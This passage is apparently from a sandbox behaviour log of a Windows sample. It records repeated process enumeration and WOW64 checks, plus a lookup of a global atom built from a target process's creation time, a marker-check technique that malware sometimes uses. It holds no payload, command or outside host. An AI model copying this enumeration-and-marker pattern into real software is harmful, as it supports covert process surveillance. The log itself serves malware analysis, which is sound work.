	[0101.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0101.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x690
	[0101.919] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.919] CloseHandle (hObject=0x690) returned 1
	[0101.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0101.919] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0101.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x690
	[0101.920] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.920] CloseHandle (hObject=0x690) returned 1
	[0101.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0101.920] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x690
	[0101.920] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.920] CloseHandle (hObject=0x690) returned 1
	[0101.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x690
	[0101.929] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.929] CloseHandle (hObject=0x690) returned 1
	[0101.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x690
	[0101.929] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.929] CloseHandle (hObject=0x690) returned 1
	[0101.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x690
	[0101.929] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.929] CloseHandle (hObject=0x690) returned 1
	[0101.929] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x690
	[0101.929] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.929] CloseHandle (hObject=0x690) returned 1
	[0101.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x690
	[0101.930] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.930] CloseHandle (hObject=0x690) returned 1
	[0101.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0101.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x690
	[0101.930] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.930] CloseHandle (hObject=0x690) returned 1
	[0101.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x690
	[0101.930] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.930] CloseHandle (hObject=0x690) returned 1
	[0101.930] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x690
	[0101.930] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.930] CloseHandle (hObject=0x690) returned 1
	[0101.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x690
	[0101.931] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.931] CloseHandle (hObject=0x690) returned 1
	[0101.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x690
	[0101.931] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.931] CloseHandle (hObject=0x690) returned 1
	[0101.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x690
	[0101.931] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.931] CloseHandle (hObject=0x690) returned 1
	[0101.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x690
	[0101.931] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.931] CloseHandle (hObject=0x690) returned 1
	[0101.931] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x690
	[0101.932] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.932] CloseHandle (hObject=0x690) returned 1
	[0101.932] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x690
	[0101.934] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.934] CloseHandle (hObject=0x690) returned 1
	[0101.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x690
	[0101.934] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.934] CloseHandle (hObject=0x690) returned 1
	[0101.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x690
	[0101.934] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.934] CloseHandle (hObject=0x690) returned 1
	[0101.934] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x690
	[0101.934] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.934] CloseHandle (hObject=0x690) returned 1
	[0101.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x690
	[0101.935] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.935] CloseHandle (hObject=0x690) returned 1
	[0101.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x690
	[0101.935] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.935] CloseHandle (hObject=0x690) returned 1
	[0101.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x690
	[0101.935] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.935] CloseHandle (hObject=0x690) returned 1
	[0101.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x690
	[0101.935] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.935] CloseHandle (hObject=0x690) returned 1
	[0101.935] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x690
	[0101.935] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.935] CloseHandle (hObject=0x690) returned 1
	[0101.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x690
	[0101.936] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.936] CloseHandle (hObject=0x690) returned 1
	[0101.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x690
	[0101.936] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.936] CloseHandle (hObject=0x690) returned 1
	[0101.936] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x690
	[0101.936] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.945] CloseHandle (hObject=0x690) returned 1
	[0101.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x690
	[0101.945] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.945] CloseHandle (hObject=0x690) returned 1
	[0101.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x690
	[0101.945] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.945] CloseHandle (hObject=0x690) returned 1
	[0101.945] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0101.945] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.945] CloseHandle (hObject=0x690) returned 1
	[0101.946] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0101.946] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0101.946] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0101.946] GetProcessTimes (in: hProcess=0x690, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0101.947] wsprintfA (in: param_1=0x3993b28, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0101.947] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0101.947] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0101.947] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0101.948] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0101.948] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0101.948] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0101.948] CloseHandle (hObject=0x690) returned 1
	[0101.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0101.948] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x690
	[0101.948] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.948] CloseHandle (hObject=0x690) returned 1
	[0101.949] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x690
	[0101.949] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0101.949] CloseHandle (hObject=0x690) returned 1
	[0102.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0102.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0102.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0102.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0102.007] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0102.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0102.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0102.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0102.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0102.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0102.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0102.008] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0102.009] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0102.056] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0102.056] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0102.056] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0102.056] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0102.056] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0102.056] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x690
	[0102.056] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.056] CloseHandle (hObject=0x690) returned 1
	[0102.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0102.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0102.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x690
	[0102.057] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.057] CloseHandle (hObject=0x690) returned 1
	[0102.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0102.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x690
	[0102.057] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.057] CloseHandle (hObject=0x690) returned 1
	[0102.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x690
	[0102.058] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.058] CloseHandle (hObject=0x690) returned 1
	[0102.058] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x690
	[0102.058] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.058] CloseHandle (hObject=0x690) returned 1
	[0102.058] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x690
	[0102.058] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.058] CloseHandle (hObject=0x690) returned 1
	[0102.058] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x690
	[0102.058] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.058] CloseHandle (hObject=0x690) returned 1
	[0102.058] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x690
	[0102.058] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.058] CloseHandle (hObject=0x690) returned 1
	[0102.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0102.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x690
	[0102.059] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.059] CloseHandle (hObject=0x690) returned 1
	[0102.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x690
	[0102.059] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.059] CloseHandle (hObject=0x690) returned 1
	[0102.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x690
	[0102.059] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.059] CloseHandle (hObject=0x690) returned 1
	[0102.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x690
	[0102.059] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.059] CloseHandle (hObject=0x690) returned 1
	[0102.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x690
	[0102.060] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.060] CloseHandle (hObject=0x690) returned 1
	[0102.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x690
	[0102.060] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.060] CloseHandle (hObject=0x690) returned 1
	[0102.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x690
	[0102.060] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.060] CloseHandle (hObject=0x690) returned 1
	[0102.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x690
	[0102.060] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.060] CloseHandle (hObject=0x690) returned 1
	[0102.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x690
	[0102.060] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.060] CloseHandle (hObject=0x690) returned 1
	[0102.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x690
	[0102.061] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.061] CloseHandle (hObject=0x690) returned 1
	[0102.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x690
	[0102.061] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.061] CloseHandle (hObject=0x690) returned 1
	[0102.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x690
	[0102.061] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.061] CloseHandle (hObject=0x690) returned 1
	[0102.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x690
	[0102.061] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.061] CloseHandle (hObject=0x690) returned 1
	[0102.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x690
	[0102.062] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.062] CloseHandle (hObject=0x690) returned 1
	[0102.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x690
	[0102.062] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.062] CloseHandle (hObject=0x690) returned 1
	[0102.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x690
	[0102.062] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.062] CloseHandle (hObject=0x690) returned 1
	[0102.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x690
	[0102.062] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.062] CloseHandle (hObject=0x690) returned 1
	[0102.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x690
	[0102.062] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.062] CloseHandle (hObject=0x690) returned 1
	[0102.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x690
	[0102.063] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.063] CloseHandle (hObject=0x690) returned 1
	[0102.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x690
	[0102.063] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.063] CloseHandle (hObject=0x690) returned 1
	[0102.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x690
	[0102.063] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.063] CloseHandle (hObject=0x690) returned 1
	[0102.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x690
	[0102.063] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.063] CloseHandle (hObject=0x690) returned 1
	[0102.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0102.063] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.064] CloseHandle (hObject=0x690) returned 1
	[0102.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x690
	[0102.064] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0102.067] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0102.067] GetProcessTimes (in: hProcess=0x690, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0102.067] wsprintfA (in: param_1=0x39935b0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0102.068] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0102.068] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0102.068] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0102.068] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0102.068] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0102.068] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0102.068] CloseHandle (hObject=0x690) returned 1
	[0102.068] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0102.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x690
	[0102.069] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.069] CloseHandle (hObject=0x690) returned 1
	[0102.069] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x690
	[0102.069] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.069] CloseHandle (hObject=0x690) returned 1
	[0102.150] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0102.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0102.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0102.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0102.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0102.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0102.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0102.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0102.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0102.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0102.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0102.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0102.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0102.152] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0102.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0102.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0102.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0102.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0102.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x690
	[0102.153] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.153] CloseHandle (hObject=0x690) returned 1
	[0102.153] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0102.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0102.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x690
	[0102.154] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.154] CloseHandle (hObject=0x690) returned 1
	[0102.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0102.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x690
	[0102.154] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.154] CloseHandle (hObject=0x690) returned 1
	[0102.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x690
	[0102.154] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.154] CloseHandle (hObject=0x690) returned 1
	[0102.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x690
	[0102.154] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.157] CloseHandle (hObject=0x690) returned 1
	[0102.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x690
	[0102.158] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.158] CloseHandle (hObject=0x690) returned 1
	[0102.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x690
	[0102.158] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0102.158] CloseHandle (hObject=0x690) returned 1
	[0102.158] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x690
	[0102.158] IsWow64Process (in: hProcess=0x690, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
